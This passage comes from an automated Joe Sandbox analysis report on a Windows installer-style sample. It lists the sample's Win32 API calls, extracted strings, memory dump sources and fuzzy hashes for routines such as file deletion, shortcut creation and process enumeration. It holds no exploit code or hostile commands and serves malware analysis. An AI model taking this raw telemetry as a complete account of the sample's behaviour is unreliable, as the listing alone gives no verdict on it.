                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $ @$M$N
                                                                                              • API String ID: 1638840714-3479655940
                                                                                              • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                              • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                              • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                              • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                              Strings
                                                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                              • \*.*, xrefs: 00406D2F
                                                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                              • ptF, xrefs: 00406D1A
                                                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                              • API String ID: 2035342205-1650287579
                                                                                              • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                              • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427179,774D23A0,00000000), ref: 00406902
                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                              • String ID: F$A
                                                                                              • API String ID: 3347642858-1281894373
                                                                                              • Opcode ID: 32407b6bdd898e1cc83aee43e79530abfe983c58d6e861651b204bdf5b03de2d
                                                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                              • Opcode Fuzzy Hash: 32407b6bdd898e1cc83aee43e79530abfe983c58d6e861651b204bdf5b03de2d
                                                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                              • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                              • API String ID: 1916479912-1189179171
                                                                                              • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                              • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                              • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                              • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                              APIs
                                                                                              • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427179,774D23A0,00000000), ref: 00406902
                                                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                              • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427179,774D23A0,00000000), ref: 00406A73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                              • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 3581403547-1792361021
                                                                                              • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                              • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                              • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                              • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                              Strings
                                                                                              • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                              • API String ID: 542301482-1377821865
                                                                                              • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                              • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                              • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                              • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                              • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                              • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                              • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                              • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                              • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                              • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                              • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                              • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                              • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                              • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                              • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                              • API String ID: 20674999-2124804629
                                                                                              • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                              • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                              • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                              • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                              • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                              • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                              • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                              • wsprintfA.USER32 ref: 00406B79
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                              • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                              • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                              • API String ID: 565278875-3368763019
                                                                                              • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                              • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                              • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                              • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                              • DeleteObject.GDI32(?), ref: 004010F6
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                              • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                              • DeleteObject.GDI32(?), ref: 0040116E
                                                                                              • EndPaint.USER32(?,?), ref: 00401177
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
